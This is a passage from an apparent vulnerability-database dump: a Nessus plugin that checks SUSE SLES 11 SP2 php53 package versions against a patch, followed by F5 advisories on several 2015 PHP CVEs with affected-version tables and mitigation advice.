value:\"https://www.suse.com/security/cve/CVE-2014-9767/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0231/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0232/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0273/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1352/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2301/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2305/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2783/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2787/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3152/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3329/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3411/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4021/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4022/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4024/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4026/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4116/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4148/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4598/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4599/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4600/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4601/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4602/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4603/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4643/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4644/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5161/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5589/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5590/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6831/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6833/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6836/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6837/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6838/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7803/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8835/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8838/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8866/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8867/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8873/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8874/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8879/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2554/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3141/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3142/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3185/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4070/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4073/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4342/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4346/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4537/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4538/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4539/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4540/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4541/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4542/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4543/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4544/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5093/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5094/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5095/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5096/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5114/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161638-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dc947fb9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP2-LTSS :\n\nzypper in -t patch slessp2-php53-12621=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"apache2-mod_php53-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-bcmath-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-bz2-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-calendar-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-ctype-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-curl-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-dba-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-dom-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-exif-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-fastcgi-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-fileinfo-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-ftp-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-gd-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-gettext-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-gmp-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-iconv-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-intl-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-json-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-ldap-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-mbstring-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-mcrypt-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-mysql-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-odbc-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-openssl-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pcntl-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pdo-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pear-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pgsql-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pspell-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-shmop-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-snmp-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-soap-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-suhosin-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-sysvmsg-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-sysvsem-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-sysvshm-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-tokenizer-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-wddx-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-xmlreader-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-xmlrpc-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-xmlwriter-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-xsl-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-zip-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-zlib-5.3.17-47.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-03-21T18:28:50", "description": "\nF5 Product Development has assigned ID 534075 (BIG-IP), ID 536881 (BIG-IQ), and ID 536882 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP AAM| 12.0.0 \n11.6.0 \n11.4.0 - 11.5.3| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP AFM| 12.0.0 \n11.6.0 \n11.3.0 - 11.5.3| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP Analytics| 12.0.0 \n11.6.0 \n11.0.0 - 11.5.3| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP APM| 12.0.0 \n11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP ASM| 12.0.0 \n11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP DNS| 12.0.0| 12.1.0| Low| PHP in Control Plane \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP in Control Plane \nBIG-IP GTM| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP Link Controller| 12.0.0 \n11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP PEM| 12.0.0 \n11.6.0 \n11.3.0 - 11.5.3| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Low| PHP in Control Plane \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP in Control Plane \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP in Control Plane \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| PHP in Control Plane \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| PHP in Control Plane \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| PHP in Control Plane \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| PHP in Control Plane \nBIG-IQ ADC| 4.5.0| None| Low| PHP in Control Plane \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n_**Important**: Although the software of the affected F5 products contains the vulnerable code, the affected F5 products do not use the vulnerable code in a way that exposes the vulnerability in a default configuration for the control plane. There is no data plane exposure for this vulnerability on the affected F5 products. _\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should permit management access to F5 products over a secure network and limit access to only trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\nAdditionally, you should avoid any customization of PHP files on the affected F5 products.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-10-08T10:11:00", "type": "f5", "title": "PHP vulnerabilities CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, and CVE-2015-6838", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2017-04-06T16:51:00", "id": "F5:K17377", "href": "https://support.f5.com/csp/article/K17377", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:49:01", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should permit management access to F5 products over a secure network and limit access to only trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nAdditionally, you should avoid any customization of PHP files on the affected F5 products.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-10-08T00:00:00", "type": "f5", "title": "SOL17377 - PHP vulnerabilities CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, and CVE-2015-6838", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2016-11-08T00:00:00", "id": "SOL17377", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/300/sol17377.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nPHP reports:\n\nCore:\n\t \nFixed bug #70172 (Use After Free Vulnerability in unserialize()).\nFixed bug #70219 (Use after free vulnerability in session deserializer).\n\nEXIF:\n\t \nFixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD 